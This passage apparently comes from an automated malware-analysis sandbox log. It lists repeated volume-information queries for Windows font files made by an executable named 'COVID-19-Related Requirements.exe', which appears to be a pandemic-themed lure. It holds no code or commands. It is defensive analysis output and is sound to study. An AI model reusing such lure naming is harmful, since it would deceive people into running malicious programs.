          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\COVID-19-Related Requirements.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
